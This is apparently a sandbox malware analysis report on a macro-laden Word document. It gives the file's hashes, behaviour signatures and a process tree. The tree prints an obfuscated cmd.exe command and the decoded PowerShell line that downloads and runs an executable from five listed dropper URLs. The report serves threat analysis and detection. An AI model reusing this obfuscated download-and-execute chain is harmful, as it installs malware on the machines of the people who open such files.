Overview

overview

10

Static

static

8

ee7b3e6582...18.doc

windows7-x64

10

ee7b3e6582...18.doc

windows10-2004-x64

10

Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    20-09-2024 21:45

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ee7b3e658278e4d4a780e5dcea37cfdc_JaffaCakes118.doc

  • Size

    77KB

  • MD5

    ee7b3e658278e4d4a780e5dcea37cfdc

  • SHA1

    6ae05523d9333400cc8ac0892da32b99354b294d

  • SHA256

    32295c7c8473f48ea5e32dc2013f71af234bb6863009d7905d4291a295fed9b8

  • SHA512

    af90f7acd8ca3e8fe4ad689164f1ef0f0321b1743bcf872370b23076a90cff13302887811be18ace415dab07de18a26f19dfb7a2af7c649e5222851058779292

  • SSDEEP

    1536:+ptJlmrJpmxlRw99NB++akPVbFuZ5RmBy:Ste2dw99f1qZ

Score
10/10
discoveryexecution

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://milehighffa.com/Wn0Kwn
exe.dropper

http://yess.pl/YdJytbr
exe.dropper

http://auto-diagnost.com.ua/F
exe.dropper

http://silverlineboatsales.com/1R906A1
exe.dropper

http://miaudogs.pt/x3ZLoewB

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

    execution
  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Office loads VBA resources, possible macro or embedded object present
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ee7b3e658278e4d4a780e5dcea37cfdc_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:548
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2316
      • C:\Windows\SysWOW64\cmd.exe
        cmd /V/C"s^e^t 9^E^F= ^ ^ ^ ^ ^ ^ ^ ^ ^ }}^{hc^tac^}^;k^a^erb;^w^HY^$^ ^metI-^ek^ovn^I^;)^wHY$^ ^,^z^Fp^$(eliF^dao^lnw^o^D^.M^zV^${^yr^t{)^b^Pv^$^ n^i zF^p$(^hca^er^of;^'^e^xe^.'+^fv^f$+'^\^'+cil^bup:vn^e$^=^wHY$;'^8^84^'^ = fv^f^$^;)^'@'(^til^p^S.'^B^w^e^oLZ3^x/^tp.^sg^o^du^a^im//^:ptth^@1A^6^09R^1/^moc^.s^e^last^a^o^b^en^i^lr^ev^l^is//^:^pt^t^h@^F/a^u^.moc.t^s^on^g^a^id-otu^a//^:p^tth^@r^btyJ^d^Y/l^p^.^s^s^e^y//^:^ptt^h@n^w^K0nW/^moc.^a^f^fh^gihe^l^i^m//^:ptt^h'^=^bPv$;^tne^i^lCbe^W.^teN^ tcejb^o^-w^en^=MzV^$^ ^l^l^e^hsre^w^op&&^f^or /^L %^3 ^in (3^5^9^;-^1^;0)^d^o ^s^e^t Wv^8^b=!Wv^8^b!!9^E^F:~%^3,1!&&^i^f %^3==^0 c^al^l %Wv^8^b:~^6%"
        2⤵
        • Process spawned unexpected child process
        • An obfuscated cmd.exe command-line is typically used to evade detection.
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2744
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell $VzM=new-object Net.WebClient;$vPb='http://milehighffa.com/Wn0Kwn@http://yess.pl/YdJytbr@http://auto-diagnost.com.ua/F@http://silverlineboatsales.com/1R906A1@http://miaudogs.pt/x3ZLoewB'.Split('@');$fvf = '488';$YHw=$env:public+'\'+$fvf+'.exe';foreach($pFz in $vPb){try{$VzM.DownloadFile($pFz, $YHw);Invoke-Item $YHw;break;}catch{}}
          3⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2648

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
      Filesize

      19KB

      MD5

      a45814c4503e085bdac30a8a0f9fbb12

      SHA1

      aed8e90acb858fa3f7667046a4e339485ec46de9

      SHA256

      9d269ca536f731eed64260a232d73f56708e98a8441a5d0738cf5c574ea590e9

      SHA512

      83ae7c9f941393a36f14bc2bb48463ea7f042c3e0abde188fe0a41811acf0ce160ac488ecaa31ed58fc9f62a36db0aa92f3d78d486a917fe56700a1156bbb504

      Download Submit

    • memory/548-6-0x00000000003A0000-0x00000000004A0000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/548-18-0x00000000003A0000-0x00000000004A0000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/548-5-0x00000000003A0000-0x00000000004A0000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/548-22-0x00000000003A0000-0x00000000004A0000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/548-4-0x00000000003A0000-0x00000000004A0000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/548-16-0x00000000003A0000-0x00000000004A0000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/548-9-0x00000000003A0000-0x00000000004A0000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/548-8-0x00000000003A0000-0x00000000004A0000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/548-7-0x00000000003A0000-0x00000000004A0000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/548-0-0x000000002F901000-0x000000002F902000-memory.dmp

      Filesize

      4KB

      Download

    • memory/548-12-0x00000000003A0000-0x00000000004A0000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/548-2-0x000000007159D000-0x00000000715A8000-memory.dmp

      Filesize

      44KB

      Download

    • memory/548-17-0x00000000003A0000-0x00000000004A0000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/548-20-0x00000000003A0000-0x00000000004A0000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/548-49-0x000000007159D000-0x00000000715A8000-memory.dmp

      Filesize

      44KB

      Download

    • memory/548-30-0x000000007159D000-0x00000000715A8000-memory.dmp

      Filesize

      44KB

      Download

    • memory/548-31-0x00000000003A0000-0x00000000004A0000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/548-32-0x00000000003A0000-0x00000000004A0000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/548-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

      Download

    • memory/548-48-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2648-25-0x0000000005610000-0x000000000566B000-memory.dmp

      Filesize

      364KB

      Download